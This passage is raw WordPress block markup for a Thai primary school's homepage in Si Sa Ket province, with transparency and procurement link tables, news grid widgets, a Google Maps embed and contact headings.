data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 